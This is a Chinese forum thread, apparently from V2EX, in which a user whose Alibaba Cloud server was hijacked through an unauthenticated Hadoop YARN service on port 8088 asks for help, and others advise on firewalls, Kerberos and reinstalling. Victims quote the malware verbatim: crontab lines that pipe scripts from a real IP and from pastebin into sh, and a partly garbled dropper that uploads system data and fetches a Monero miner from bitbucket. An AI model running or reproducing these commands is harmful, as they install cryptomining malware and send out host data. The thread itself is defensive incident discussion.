我都关了 root 登录 关闭了密码登录只允许秘钥登录 最后好像还是让某位大哥从 8088 进去了好像？ cpu 100%(就是一个阿里云的学生机而已，这点性能也要搞我) crontab 里面给我加了个每秒执行的 wget ,

• • • • • wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
          具体意思我就看不太懂了 就知道去给我 wget 下了一个脚本吧

问问老哥们怎么防啊 。我去阿里云安全组设置规则端口地址段访问的时候说最多支持一组授权对象(离开家门之后网络就变了想有多个 ip 可以访问这个阿里云机器)。没搞好。 然后现在就是直接 firewall 把 8088 关了。20 分钟了还没出事。没关端口之前是 10~15 分钟 就会出问题。

这个 firewall 和安全组能特定多个 ip 访问端口吗？ 还有啊 有没有办法把这个搞我的地址弄出来啊 然后顺便加个排除他 ip 之类的

cpu 百分百？那估计是挖矿脚本
估计你在 8088 端口启的服务有漏洞

ax --sort=-pcpu > /tmp/tmp2.txt
-antp > /tmp/tmp2.txt
-l > /tmp/tmp2.txt
-eo uid,pid,ppid,stime,%cpu,cmd --sort=-%cpu |grep -v STIME| head>/tmp/tmp2.txt
-c -n 1 -b > /tmp/tmp.txt
curl -F "[email&http://46.249.38.186/rep.php
rm -rf /tmp/tmp2.txt
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
$LDR https://bitbucket.org/okjh6t37/mygit/raw/master/zz.sh | sh
else
pwd
fi

这可能是那个脚本

你好 请问有办法限制 ip 吗？ 我搞了一会搞不好 直接关了 8088 我这边好多也不方便了

以前没在意过这些 安全组都是直接地址段访问然后 0.0.0.0/0
这会有点难受了

你是要跑什么东西？还是去好好补补安全常识吧，直接 0.0.0.0/0 也是心大。

有漏洞就抓紧补上。留着漏洞，只限 IP，这是什么操作？

哈哈，这点性能也要搞我
两年多前我遇到这种情况是因为 redis 没密码，看看有什么漏洞

https://bitbucket.org/okjh6t37/mygit/raw/master/x_64
这个是实际执行的二进制文件，看着像门罗币的挖矿病毒 xmrig
我之前开 aria2c 没设密钥的时候也中过一回类似的东西，你还是排查下对外开启的服务吧，看看有哪个可能有漏洞的，话说你 8088 开的什么服务啊
限制 ip 的话，你先看看安全组有没相关的设置吧，有的话用那个就行。
如果有经验的话，可以用 iptables。不行的话用 /etc 下的 host.allow，host.deny 也可以试试

8088 跑着一个 yarn 我刚才查到是 nodemanager 的漏洞 最开始好像是个俄罗斯黑客发现并利用的漏洞， 目前还在继续找解决办法

确实好像是一个服务有漏洞

iptables 或者 firewall 屏蔽不得行？

看着的确是挖矿的

Hadoop yarn 吧，这个应该是未添加认证，可以直接执行的，加个口令或者限制在内网。

一般都是脚本刷漏洞的…别人也不是专门入侵你一个…

曾经我每次 ssh 登陆上，好几千的失败登陆。后来我改了端口号，清净了

不是对外公有服务，那就 ssh is 端口外都关闭，需要访问其它服务，装平装 openvpn，或者 ssh 端口映射到本地。

就是说 不管这些人是通过什么方式入侵 最后都是通过 ssh 吗 ssh 端口我倒是没改 只是禁了 root 和密码登录， 我搜索到的是说我 8088 跑的东西有一些安全机制的问题 ，后台的版本修复了 。但是我用的那个版本较低，还是有这个漏洞的。 老哥我已经好几个问题看见你帮我了 /笑哭 多谢多谢

ssh 端口无所谓，只允许 key 认证 + 禁止 root 登陆就行了（个人观点)，我意思是 ss 之外其它端口干脆都禁掉，需要用的话，利用 openvpn (当然要仅对允许的访客 IP 开端口，当然要使用证书连接)，或者 ssh 端口映射本地。
另外，系统已经被爆(橘)，受到污染的情况下，最好是备份好数据和能信任的干净配置信息前提下，干掉系统重装+更新+防火期 了事。

是 yarn 加个口令是什么操作命令行还是配置文件。我搜到一个关于这个的配置文件 不过 property 里面好像有些变量 在对号

好

46.249.38.186 防火墙屏蔽一下不行吗？这个机器是”大便“的开 22 口了

兄弟怎么解决的。。我也是 crontab 显示：*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
终止后仍然是 cpu100%

学习了

我这会就是直接把 8088 关了就没事了。你这个跟我这个是不是一样我不清楚啊。我这个是因为 8088 的一个服务有安全漏洞。然后脚本什么的应该就是通过 8088 植入的 我把 8088 关了就好了。具体你根据你自己的实际情况来。不行就把先把 crontab 弄掉。然后把你自定义的防火墙规则全关了得了 。再一步一步排查

ufw deny 8088

iptables -A INPUT -j DROP

阿里云的安全规则里面把所有端口全部关完。只开要使用的端口，然后服务器内部的 iptables 再针对已开端口做安全限制

8088 就是我要使用的端口 然后问题就是从这个端口上出的 。firewalld 和安全组我都是只开我自己用的。 但是那个 8088 上跑的程序有安全漏洞。被人黑了

如果能确定是从 8088 入侵，那就是你这个程序有漏洞
安全组，防火墙只是一道阀门，关闭端口而已，只属于防护

门罗币 hadoop 的漏洞 。 我之前也遭过

请问你最后是怎么解决呢？ 关死端口不太方便我这边。 伪分布式的。所有服务都是在这台机器启动的。 这会在琢磨弄一下一个叫 kerberos 安全认证的东西。看看能不能其效果。 分享一下经验吧谢谢

备份数据 重装 升级 hadoop 版本 开启 kerberos 认证 google 上有解决方法
我那个 留有后门 我清了 crontab 立马就会还原 又开始挖矿 我自己解决不了 只能选择重装了 = = 很伤

先去看版本吧 有几个版本都有这个问题

tcpdump 抓包把访问 8088 端口的 IP 抓出来，再用 firewall 禁止掉